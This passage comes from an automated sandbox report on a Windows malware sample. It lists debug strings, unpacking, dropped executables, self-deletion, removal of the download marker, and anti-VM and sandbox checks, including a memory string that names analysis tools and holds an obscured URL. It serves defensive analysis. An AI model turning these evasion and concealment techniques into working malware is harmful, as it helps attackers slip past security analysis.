Source:	Binary string: mpr.pdb source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdbGCTL source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdb source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdbUGP source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: setupapi.pdb source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: combase.pdbUGP source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdbUGP source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdbUGP source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbUGP source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdbGCTL source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdbUGP source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WINMMBASE.pdb source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: comdlg32.pdb source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdbUGP source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdb source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: comdlg32.pdbUGP source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdb source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdbUGP source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mpr.pdbUGP source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdb source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source:	Binary string: ole32.pdbUGP source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\xayagejutuximo.pdb source: file.exe, beirutt.3.dr
Source:	Binary string: winmm.pdb source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbUGP source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wmswsock.pdb source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdbUGP source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbGCTL source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdbUGP source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: psapi.pdb source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbUGP source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdbUGP source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdb source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbUGP source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdbUGP source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wmswsock.pdbUGP source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: TC:\xayagejutuximo.pdb$~B\|.@ source: file.exe, beirutt.3.dr
Source:	Binary string: wuser32.pdb source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdb source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdbUGP source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\C676.exe	Unpacked PE file: 6.2.C676.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Unpacked PE file: 10.2.43D0.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.juv:R;.rur:R;.cenepem:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Unpacked PE file: 6.2.C676.exe.400000.0.unpack .text:ER;.data:W;.huxuho:R;.gini:R;.vab:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Unpacked PE file: 10.2.43D0.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E378 push eax; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B6DDC push 6700D42Eh; retf
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B5F84 push 623D8A45h; retf
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004363BD push esi; ret
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004139F8 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_006AC6A8 pushad ; ret
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_004051E9 push ecx; ret
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040E378 push eax; ret

Source: C:\Users\user\AppData\Roaming\beirutt

Code function: 7_2_0040A2E2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

Source: file.exe	Static PE information: section name: .juv
Source: file.exe	Static PE information: section name: .rur
Source: file.exe	Static PE information: section name: .cenepem
Source: C676.exe.3.dr	Static PE information: section name: .huxuho
Source: C676.exe.3.dr	Static PE information: section name: .gini
Source: C676.exe.3.dr	Static PE information: section name: .vab
Source: beirutt.3.dr	Static PE information: section name: .juv
Source: beirutt.3.dr	Static PE information: section name: .rur
Source: beirutt.3.dr	Static PE information: section name: .cenepem
Source: 4434343.dll.9.dr	Static PE information: section name: .00cfg

Source: initial sample	Static PE information: section name: .text entropy: 7.880058673023214
Source: initial sample	Static PE information: section name: .text entropy: 7.648160210316085

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\beirutt

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\43D0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	File created: C:\Users\user\AppData\Local\Temp\4434343.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\beirutt	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C676.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C4AA.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier read attributes | delete

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DLLREGISTERSERVERWKANIMHDMAWWV3SZQXYVBUPQC78ZCSCYZEXUSDVMOYWFSOSYSANDBOXK5IQR5XKKHFI0OIXFMGQKSOZVXBFCBSXP0CQKIPRNCYQHM3WLLXT6CDBBS26ESKV7845SWCP2EBLGWHVHDTWSOGZ9U9CGZZSDH2UM9TZTCXYZLXSGKNIDIWISTXFFJPSHTTP://GEKJEGOUDN6I5FBCES.JOMF6MTOBKL32EAI1QWQXSXPNFYV2SMICROSOFT BASIC DISPLAY ADAPTERAPXALPLEWOMRTXOQBIS5VVQOZJTDWDYPDWOJSVZO2QACQSIOYXZAFZ3U9IKX2BQN6EZZOXJP5PSUZKQMTGHZQELR5EG7GRIMERCTFOUNCFE4BGUM7H3R60PJIOCTMJ0M%LS\%D.DLLQU673JXMPB9XS6BLT0XDS1ALT0EJ5HLLAKOWFXNBJFIIOLTKI8WPBYDTNFYR40QJP9YSA5NKHRYBKS7IXE6TWUFX1EVDSUKHNIFAX TEGAWO NIP XEHN9YXFM4WGP9YUO5HXPMC4XQ1BZLDJLNGVBOXTRAY.EXEVMWARETRAY.EXEWECHAT.EXEVMWAREUSER.EXEFIDDLER.EXEPROCESSHACKER.EXEQQ.EXEPROCEXP.EXERDPCLIP.EXEWIRESHARK.EXEKAWEXI GEQUECI BOVOJ.EXEVBOXSERVICE.EXEVGAUTHSERVICE.EXEVMTOOLSD.EXEPRL_CC.EXEHTTPDEBUGGERUI.EXEHTTPANALYZERSTDV7.EXEPROCEXP64.EXE9VCQBULREEOHDRQECLOUDSAFELINEYQ7T94QZPUDEORTE80URPBYHQ3908APEYCDDGGZJIPRJTKOE8J4WDLLBX1APOW9EVBZ1UO2T2UBMGTUDBSQDYJSBALF5CGVCSFIMBSIBECUOLZPCIK2VP28IR0VTY4TBDYVLFRSD5XNE93CYIIGVV5KBWQ4W2ROU3OQVPIRDLVGRVMVTMQRP5J7SUNTW6WJSCCDMAYGHINOZWAXRSZKCI5FN6D9Y9HJRZHIX2JJ5NDQDFLBQ7GSN9CORX41KRUAQXIHNEOIQB1VONHHQFPG6N3LIJPAESKGQBMH2WFPZKMIH3JPNW2WWL4QOWW0SAVLN7QPQACULBYLOPUMLDJFMGRXYRKQKOVNJKRD4PQP2PQ8FNC7JABGGRSW4W0K7VSSICQYE9JT8N0NVH1MITQSNOGZQBXMIJYLHV2DLCZJ486OVC7EHTPLWZ4NT1DG4JSQGYZCQBMR6MBLZRXJGOXTXCYOA7FBPN0EGH7EX8DG8NSYCSAOGD5G0NV7R0LVA09KGCAWTJO5TB2I2LHAGZRMZ4T0EPASO079GSLJNUY5E4DLIUTNFLXFUZSNAEVRRIGWCHIYUGQ9HHPQODBLBIAQMME3ZWAAGKEJB4GPXYSRTR5EFN43BBTXITK2KKFOG8JCARLOY8GS3RRVRRJNAUFJSZGAKWZM2DEQ8OCWPZQ6O4RIWMRY77FLBKVUSFEYWTPB6Y2CTOYPQLWYAQAY5DNDXG1BSVPPP4JQ5WXP1OQ3Y3DHBZRC5X4KW1CN7YJDB9J450JE0S2RDQL7GXWP4ZKMA4WMYVM2YZR24ZUIL8P9X5RU6F5F2HM4YAEQ4STV1PKJ0
Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK760H

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\explorer.exe TID: 3980	Thread sleep count: 348 > 30
Source: C:\Windows\explorer.exe TID: 5468	Thread sleep count: 211 > 30
Source: C:\Windows\explorer.exe TID: 6076	Thread sleep count: 83 > 30
Source: C:\Windows\explorer.exe TID: 3652	Thread sleep time: -240000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\beirutt

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 854
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 844

Source: C:\Windows\SysWOW64\fontview.exe

